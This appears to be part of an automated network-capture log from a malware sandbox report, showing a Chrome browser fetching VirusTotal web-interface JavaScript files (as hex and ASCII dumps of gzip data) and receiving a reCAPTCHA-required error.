                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC356INHTTP/1.1 200 OK
                                                                                                                                                                                                                    X-Cloud-Trace-Context: d4c6f20d02122e0da0f7dd8b48b06491
                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 09:45:06 GMT
                                                                                                                                                                                                                    Expires: Fri, 25 Apr 2025 09:45:06 GMT
                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                    ETag: "v5PPmg"
                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                    Age: 36620
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC1052INData Raw: 30 30 30 30 30 30 30 31 0d 0a 1f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 08 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 02 0d 0a 30 30 30 30 30 30 30 31 0d 0a ff 0d 0a 30 30 30 30 30 30 30 31 0d 0a ec 0d 0a 30 30 30 30 30 30 30 31 0d 0a 5c 0d 0a 30 30 30 30 30 30 30 31 0d 0a 79 0d 0a 30 30 30 30 30 30 30 31 0d 0a 77 0d 0a 30 30 30 30 30 30 30 31 0d 0a db 0d 0a 30 30 30 30 30 30 30 31 0d 0a 46 0d 0a 30 30 66 66 30 0d 0a 92 ff 7f 3f 05 cc 24 1a 22 03 40 3c c4 53 a6 1c 59 b6 13 cf f8 8a 24 e7 25 71 fc 18 10 68 92 88 40 80 01 40 1d a6 f8 dd
                                                                                                                                                                                                                    Data Ascii: 000000010000000100000001000000010000000100000001000000010000000100000001000000010000000100000001\00000001y00000001w0000000100000001F00ff0?$"@<SY$%qh@@
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC1408INData Raw: ae 5a 35 f8 95 d2 6c f5 3a 1d a9 34 0f 9a 07 07 5c 69 d6 83 7a b3 d7 ec 83 c4 52 a7 9a 50 7f b9 52 75 f1 b1 d3 1a 0c c0 49 21 d1 72 d0 ec b6 4d cb 1b 61 56 a7 d7 6f b6 68 1a 57 d1 f4 41 50 9a 78 0e bd c4 47 a6 35 c1 c7 41 0b 9a de b4 96 d4 4a 3c 60 5a 73 7c e4 e4 33 ad 15 3e 72 74 9b d6 25 0d 00 3e 4c 6b 41 8d 83 6e 0b 1f 6f f0 71 80 fd f1 71 86 8f 07 cd 16 e6 4f f9 fe 6d 98 00 b1 6d a3 df 32 4d eb 1a fd dd 46 ef 00 03 c6 f8 d8 6c 77 1a 4d 61 0b 2e ac 2b eb 4b eb dc 3a b1 9e 5b a7 d6 1b eb 89 f5 da 3a b6 ce ac 17 d6 5b eb 37 eb a9 f5 cc 7a 6c 7d b0 be b5 5e 5a af ac ef ac 9f ad df ad 1f ac 9f ac 1f ad 7f 15 f6 e3 df ff 6f 3f fe 24 fb f1 7d c5 7e 4c 9d c5 ef 42 2f 26 2b 92 29 e8 fd 74 05 f3 5a 77 1c 27 b7 cc 52 6f 7b f1 f2 e6 3c 8e c3 2c 58 9e c3 fe 8c 6a
                                                                                                                                                                                                                    Data Ascii: Z5l:4\izRPRuI!rMaVohWAPxG5AJ<`Zs|3>rt%>LkAnoqqOmm2MFlwMa.+K:[:[7zl}^Zo?$}~LB/&+)tZw'Ro{<,Xj
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC1408INData Raw: 6a 5e 1c da f2 50 dc d3 4c 6b 44 6b 25 d5 4f c0 55 4f 72 a9 e6 a2 5d fc 02 5b ec f6 84 b7 91 b4 e5 15 df 83 28 dd 47 7e 0d 18 5e 6b 9c ad 3b 98 d2 e8 73 d5 02 26 de ed 6e 96 fc c9 4f 77 34 b7 d5 79 c5 69 c4 f9 fd ed 64 19 a1 2f 74 82 e9 13 9e 76 f5 91 50 24 f6 41 48 27 19 f0 38 e7 1c 2d f6 d5 15 02 c2 bd 0a f3 d4 60 6e b7 ac 80 72 b2 28 10 29 3b 59 1f 47 3f 25 26 0b 3e bd 93 f7 74 0a 1c 83 02 c7 7f 53 0a cc 1d 3d 39 f8 27 20 7f 07 46 ee c5 7f 70 8f 8e d0 d9 3f d8 db 43 fe 55 e9 89 9d c2 ac e3 fe 0c b8 3f fb 9b e2 7e e9 e8 89 de 3f 01 f7 15 6c dc 8b f7 f8 33 f0 1e ef ed c5 05 de 0b cd a8 23 fb 05 90 fd e2 6f 8a ec 4b 07 30 97 32 c8 7f 02 c2 09 0d 77 61 d9 84 22 b2 23 24 de 61 25 e6 70 0f 3f c0 80 ba 61 4d 25 5d 60 52 61 43 4a a6 f4 50 a8 b1 dc c6 48 8d 47
                                                                                                                                                                                                                    Data Ascii: j^PLkDk%OUOr][(G~^k;s&nOw4yid/tvP$AH'8-`nr();YG?%&>tS=9' Fp?CU?~?l3#oK02wa"#$a%p?aM%]`RaCJPHG
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC429INData Raw: 45 94 25 27 59 d2 38 ac 7c a3 79 54 ba e6 e2 f3 26 b1 7f 63 23 66 ce 02 28 1e 21 fd fa 52 5c 6e e5 3e d3 d4 ee d4 a4 00 0a e9 96 1c ad 44 5d db 17 50 6c 49 c3 37 7a 51 01 06 68 47 98 c3 61 15 9a 53 df b0 72 30 21 fa 72 33 57 9d 1e 50 75 8d 45 6a 37 6b 46 12 d3 f5 8f 48 f4 56 ee 72 b1 9d be f2 f6 51 1e ee 43 d7 2a cc 89 18 95 df 0f 4a 87 06 59 e2 e2 fe 8f 00 21 3c f3 15 95 9a e7 97 e1 d4 ca 75 3f d5 bd 8e 6a 57 81 9f cd 87 70 5b 96 d7 e8 39 87 75 36 9e c7 27 06 aa 4d a1 72 52 e3 a7 e3 d3 63 23 01 e1 81 2c 89 d7 c9 11 9c 1f 24 4c 10 cd fb 06 77 cb ca 9d 34 1a 6c e2 28 ff a0 d0 b3 12 f9 02 74 80 21 15 6f 35 c4 22 43 02 d1 aa 53 cd e6 3a 76 e2 2e 3c 13 5c a8 d1 25 92 fa 54 4f 9c 6f 17 ce f3 d7 27 e3 b3 f3 d3 a7 c7 2f 51 7a ea 87 ce b3 e7 2f ce 9f 9e 8e 1f ff
                                                                                                                                                                                                                    Data Ascii: E%'Y8|yT&c#f(!R\n>D]PlI7zQhGaSr0!r3WPuEj7kFHVrQC*JY!<u?jWp[9u6'MrRc#,$Lw4l(t!o5"CS:v.<\%TOo'/Qz/
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC1408INData Raw: 30 30 30 30 30 30 30 31 0d 0a 95 0d 0a 30 30 30 30 30 30 30 31 0d 0a 73 0d 0a 30 30 30 30 30 30 30 31 0d 0a 13 0d 0a 30 30 30 30 30 30 30 31 0d 0a ab 0d 0a 30 30 30 30 30 30 30 31 0d 0a a7 0d 0a 30 30 30 30 30 30 30 31 0d 0a 32 0d 0a 30 30 30 30 30 30 30 31 0d 0a f5 0d 0a 30 30 30 30 30 30 30 31 0d 0a 42 0d 0a 30 30 30 30 30 30 30 31 0d 0a ca 0d 0a 30 30 30 30 30 30 30 31 0d 0a 65 0d 0a 30 30 30 30 30 30 30 31 0d 0a 47 0d 0a 30 30 30 30 30 30 30 31 0d 0a fd 0d 0a 30 30 30 30 30 30 30 31 0d 0a d5 0d 0a 30 30 30 30 30 30 30 31 0d 0a 0f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 50 0d 0a 30 30 30 30 30 30 30 31 0d 0a 2d 0d 0a 30 30 30 30 30 30 30 31 0d 0a 3f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 68 0d 0a 30 30 30 30 30 30 30 31 0d 0a 2a 0d 0a 30 31 0d 0a 5d 0d 0a 63
                                                                                                                                                                                                                    Data Ascii: 0000000100000001s0000000100000001000000010000000120000000100000001B0000000100000001e00000001G00000001000000010000000100000001P00000001-00000001?00000001h00000001*01]c
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC1408INData Raw: 64 af 80 44 ee 39 c0 b2 ed 2e fe 57 5c 2b e2 14 61 43 d9 62 89 28 27 a0 33 37 ba ad 49 4f d2 35 55 79 de ad 51 ad 01 fd 94 a1 e7 d6 58 5b a9 d5 e8 36 5a b9 e0 e0 0c d5 01 8d c6 c1 41 bf 72 92 ea 98 7e 03 9c 52 3e 4f 75 48 d7 6f e2 41 3b 01 0b 94 f7 3c db da 48 e7 10 e2 ea 8f 0e 50 a4 9a cc 6c 54 43 e3 a9 1b 22 e5 d4 f7 a7 52 ec 0a a4 e8 23 58 83 7e ca 08 29 f5 7b d3 01 63 a2 9f 13 b4 d4 d9 99 b6 95 34 2a 92 ea fd 10 d5 16 93 f2 2c 89 5a ea 76 59 53 ed 2d 10 50 ea f5 a6 f8 11 3b f3 c3 eb 9d ba 00 e6 07 17 77 05 f9 e1 07 fe a4 3f 55 47 cb 39 42 de 28 e4 a3 bc 16 fd 54 10 50 59 69 d2 f0 d9 44 aa 2a 81 84 ca 80 c1 c0 73 a7 f2 a0 39 22 2a 63 a6 1d af 37 90 ac a7 90 51 19 c2 fa 6e cf 95 d2 23 11 52 19 a1 ab 29 81 94 ca 00 5d 05 71 8d 29 65 ac 03 f1 6a c9 5f e2
                                                                                                                                                                                                                    Data Ascii: dD9.W\+aCb('37IO5UyQX[6ZAr~R>OuHoA;<HPlTC"R#X~){c4*,ZvYS-P;w?UG9B(TPYiD*s9"*c7Qn#R)]q)ej_
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC686INData Raw: 86 43 3e 17 a9 4a 7e a1 fe 99 b3 df 89 6a c7 f7 b9 04 d2 01 8c 07 c1 82 5e 9b e1 46 d9 46 cf a2 a1 e4 f8 82 33 b6 7d 4d de 86 f4 75 8a 56 f2 31 3a 3d ca 64 0a 2f a8 e8 59 20 5f d6 eb f6 77 f4 90 89 1d 0c 28 99 5b 9d c3 9d 0e 5e c7 b0 dd c5 fb 10 53 2c 61 1d 2e d8 cd 34 c1 13 d5 a9 81 17 52 21 bb 96 a6 f6 04 04 a7 77 c6 2d 59 ba 6e 7c b5 9e 20 6f 36 4b e8 8d 1a f9 93 0f f6 b5 d0 eb fa 74 62 01 c8 0b 4a eb 48 e1 ac b3 78 5d 48 3a 5e 75 05 f9 a8 b7 bb 14 62 e1 8e 49 db 55 4d c3 0e 57 b4 5b 31 29 45 16 9a d5 1b e6 a6 83 66 65 bb 9b 87 c5 00 ce 2d fa 5a 78 23 99 c7 e6 dc 8e d8 a8 5c bc 5a eb 33 9d 06 de cc a5 6d ac 0f be 72 2f d9 1a e9 bc af 72 a6 5c b8 29 ae b0 e5 2b 29 86 c8 bc 36 be 32 1a 5f c1 b6 ed 6a de 6c 1c 6e 82 64 e2 40 da a8 d3 6f 1f 1f d3 3b df c4
                                                                                                                                                                                                                    Data Ascii: C>J~j^FF3}MuV1:=d/Y _w([^S,a.4R!w-Yn| o6KtbJHx]H:^ubIUMW[1)Efe-Zx#\Z3mr/r\)+)62_jlnd@o;
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    111192.168.2.164986274.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC689OUTGET /gui/82353.cb048b4e709c7dfeabf5.js HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC357INHTTP/1.1 200 OK
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 52b2c0927cb98197200f786462d1be3c
                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Date: Fri, 19 Apr 2024 12:30:04 GMT
                                                                                                                                                                                                                    Expires: Sat, 19 Apr 2025 12:30:04 GMT
                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                    ETag: "4IXFzQ"
                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                    Age: 545122
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC1051INData Raw: 30 30 30 30 30 30 30 31 0d 0a 1f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 08 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 02 0d 0a 30 30 30 30 30 30 30 31 0d 0a ff 0d 0a 30 30 30 30 30 30 30 31 0d 0a ec 0d 0a 30 30 30 30 30 30 30 31 0d 0a 5a 0d 0a 30 30 30 30 30 30 30 31 0d 0a 6b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 4f 0d 0a 30 30 30 30 30 30 30 31 0d 0a e4 0d 0a 30 30 30 30 30 30 30 31 0d 0a c8 0d 0a 30 30 30 30 30 30 30 31 0d 0a 92 0d 0a 30 30 30 30 30 30 30 31 0d 0a fd 0d 0a 30 30 30 30 30 30 30 31 0d 0a be 0d 0a 30 30 30 30 30 30 30 31
                                                                                                                                                                                                                    Data Ascii: 000000010000000100000001000000010000000100000001000000010000000100000001000000010000000100000001Z00000001k00000001O000000010000000100000001000000010000000100000001
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC1408INData Raw: b9 bf 7b 74 d4 77 bd 88 66 1d ec 7d d9 71 bd 04 9f 5f 0e f6 f7 3f bb 5e 45 9f 47 07 bb bb ae 37 c5 e7 11 86 e2 73 46 63 77 76 b1 ea 13 be f6 3f 1f 1e e2 b3 a4 cf 9d 83 c3 03 77 08 3b b4 32 6f e2 bd 7a 63 6f e4 6d 79 cf de a3 77 e3 bd 78 e7 c4 be 90 f4 3e 84 e3 59 1e 13 87 ea 92 c6 75 23 ed b5 00 cd b8 0a 67 19 dc 44 1d 28 dd 04 c5 f5 f1 de 29 1b 34 36 9c 9e a6 e1 d5 e8 27 ae df 00 1e e0 ea 39 ff ad 2a 4a 78 e2 d7 af ac 8e 2b 5e d2 0d 4e f7 fe 20 1d f2 b1 63 17 72 a8 8d f3 7e 2d 59 31 b6 ae d9 98 ce b5 d7 b3 35 09 6b 7d 41 c2 e2 a2 82 de b9 79 d8 0c 6f 9b 5a 7a 87 2c 45 f8 32 c6 66 74 00 31 ee 72 45 ae bf 33 8c 4f c2 fe 30 f6 7d d7 81 26 dc c5 f7 2e 59 4f e8 10 17 85 93 bb 83 fa 84 3e 40 a3 87 1f f2 83 ae ba dc d5 46 8e fe 5e 2f ef f5 1a 2e 13 36 e6 39 d3
                                                                                                                                                                                                                    Data Ascii: {twf}q_?^EG7sFcwv?w;2ozcomywx>Yu#gD()46'9*Jx+^N cr~-Y15k}AyoZz,E2ft1rE3O0}&.YO>@F^/.69
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC1408INData Raw: bb aa fe 8a d6 ef 14 a6 00 ad 69 ec fc e1 a3 2d 1e f4 16 0f cb 04 ba 83 3f 5e f8 f6 a3 85 6f f5 c2 b7 ef d0 fe ab 76 40 b6 dc 5d e5 67 1f ed 79 d6 e9 e1 59 78 b6 ae 87 67 9a a6 33 a9 28 0e 61 7b 52 5b fe 00 e6 22 12 7c 85 67 d5 7e a3 59 50 07 00 71 ad 7d 5c 7d 44 d7 55 47 d7 55 78 b5 4e d7 95 a6 eb 0a 74 b5 71 c6 f5 da 92 46 00 71 dd eb 5d 07 65 c5 e1 29 1b 44 14 3e ec 36 9a 38 76 d3 68 7b 9f fa a6 a9 49 3e 79 7d 5b 21 e3 20 88 55 c1 a8 7a 12 a2 67 6a b6 d7 66 a8 bc 0b 0b d7 ad 3e 5d ac d1 65 b8 c2 0b cd ca 45 20 30 a9 13 d0 cf 8f 66 fd d4 b3 7e 22 23 6f af 64 ef 9b c4 39 29 6e 99 23 e7 5f 75 c0 26 76 a6 c8 bc 41 58 b9 3a ec 4e 04 48 a3 ef 3d 21 ad d9 05 c4 e8 02 05 6a c5 b0 84 27 b6 2c 36 28 5b e7 70 cd 80 d1 c8 16 25 8b bd de 0a 65 92 f3 0e 4b b4 5b e1
                                                                                                                                                                                                                    Data Ascii: i-?^ov@]gyYxg3(a{R["|g~YPq}\}DUGUxNtqFq]e)D>68vh{I>y}[! Uzgjf>]eE 0f~"#od9)n#_u&vAX:NH=!j',6([p%eK[
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC480INData Raw: d2 f4 0d 55 96 9d 2f fd f2 45 56 5a fe dc c2 d2 a9 40 7a 46 1a db bc 02 90 52 32 b2 3a 03 23 a7 c7 3c 32 23 93 cf 85 3c be ee ba 33 88 25 6b c4 b2 ca 3d 5c 23 d9 da 6e 57 2c 8a 5e da 62 d1 2f 38 cd e3 2e 25 33 a3 29 2b 90 e1 98 36 4e 9d 84 40 b1 9b 26 c8 74 f3 4c 10 a8 cb 0a 24 6c 75 37 74 07 56 c2 fd d1 81 71 7a 87 42 fe 82 45 15 bd 71 a9 84 15 94 05 47 39 bb dd 53 96 bc 7e 7b 69 7f 4f 19 19 47 d7 b0 e4 e4 cc f2 ce 7a da 00 05 58 df 90 28 95 fa d0 1c 9b 69 a2 ab 57 80 aa 4c d2 ed a9 7c 7a 93 bf fc 8a af 97 64 52 79 ac f1 73 2b ae ff 2f 4b 85 c8 95 8b 40 79 3b c2 30 56 bd 10 2c f6 9d c7 6d ab 43 cd 17 1a 32 c7 eb 6c 5b 0d 95 27 ed e9 f7 78 bf e6 5d 54 5d 45 46 13 ad 31 35 47 ab 10 e7 8a a5 84 f0 f9 e3 aa c8 b4 b1 66 b5 82 ea 2d 54 55 44 94 5e ab 21 df 31
                                                                                                                                                                                                                    Data Ascii: U/EVZ@zFR2:#<2#<3%k=\#nW,^b/8.%3)+6N@&tL$lu7tVqzBEqG9S~{iOGzX(iWL|zdRys+/K@y;0V,mC2l['x]T]EF15Gf-TUD^!1
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC472INData Raw: 30 30 30 30 30 30 30 31 0d 0a fb 0d 0a 30 30 30 30 30 30 30 31 0d 0a 57 0d 0a 30 30 30 30 30 30 30 31 0d 0a 94 0d 0a 30 30 30 30 30 31 0d 0a 3f 0d 0a 31 39 66 0d 0a 58 94 af cd 56 97 3f 39 87 ff fd 1a 3a 1c fe 68 85 55 aa 57 72 e3 3f 4b 76 73 77 77 3b 6e 85 7a 89 d5 e4 1a 0f 5b 64 52 6c d6 f1 65 3c 4f f9 f5 16 de 91 ca c7 4b 46 4e ad 9f 55 ed 1f 7e c6 bb 29 ca 8e 83 dc 49 e9 51 15 b2 dc 2f 47 f4 26 0a 09 31 da 90 0c c9 74 18 8f 9f 30 2e 0a 73 07 ef 7e 1c a4 be 28 8e 38 31 1d 66 d4 bc 4f 96 ef 6e ed 01 bd 97 9c 13 90 9c 46 af 83 51 5a c4 8f c3 ee 25 44 7f 11 c8 da e9 fc 89 d7 7c c4 53 44 f6 03 90 e2 f8 3e fc cf 8b 3b cc da 6b f0 20 d8 af 58 66 4c 55 0d cd 7c 2b 58 2a 7f cd d5 3b 8b 3d 9a a1 ee 9b 81 fc 1e c3 35 f8 f4 e0 4d fe d4 73 31 75 80 94 c6 19 8c 79
                                                                                                                                                                                                                    Data Ascii: 0000000100000001W00000001000001?19fXV?9:hUWr?Kvsww;nz[dRle<OKFNU~)IQ/G&1t0.s~(81fOnFQZ%D|SD>;k XfLU|+X*;=5Ms1uy
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    112192.168.2.164986374.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC506OUTGET /ui/files/submission/challenge HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC225INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    X-Cloud-Trace-Context: a879fccb430374a692819aa67e44ad2b
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:26 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 181
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC181INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 52 65 63 61 70 74 63 68 61 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 50 6c 65 61 73 65 20 72 65 2d 73 65 6e 64 20 72 65 71 75 65 73 74 20 77 69 74 68 20 61 20 76 61 6c 69 64 20 72 65 43 41 50 54 43 48 41 20 72 65 73 70 6f 6e 73 65 20 69 6e 20 74 68 65 20 5c 22 78 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 5c 22 20 68 65 61 64 65 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "RecaptchaRequiredError", "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    113192.168.2.164986474.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC689OUTGET /gui/25701.8d6eda00aa53bf2b91bb.js HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC356INHTTP/1.1 200 OK
                                                                                                                                                                                                                    X-Cloud-Trace-Context: a8ecf0edc938cfd2713d36b62be0af87
                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 09:38:39 GMT
                                                                                                                                                                                                                    Expires: Fri, 25 Apr 2025 09:38:39 GMT
                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                    ETag: "v5PPmg"
                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                    Age: 37007
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    2024-04-25 19:55:26 UTC1052INData Raw: 30 30 30 30 30 30 30 31 0d 0a 1f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 08 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 02 0d 0a 30 30 30 30 30 30 30 31 0d 0a ff 0d 0a 30 30 30 30 30 30 30 31 0d 0a ec 0d 0a 30 30 30 30 30 30 30 31 0d 0a 7d 0d 0a 30 30 30 30 30 30 30 31 0d 0a 7b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 7b 0d 0a 30 30 30 30 30 30 30 31 0d 0a db 0d 0a 30 30 30 30 30 30 30 31 0d 0a c6 0d 0a 30 30 30 30 30 30 30 31 0d 0a d1 0d 0a 30 30 30 30 30 30 30 31 0d 0a ef 0d 0a 30 30 30 30 30 30 30 31 0d 0a ff 0d 0a 30 30 30 30 30 30 30 31
                                                                                                                                                                                                                    Data Ascii: 000000010000000100000001000000010000000100000001000000010000000100000001000000010000000100000001}00000001{00000001{000000010000000100000001000000010000000100000001
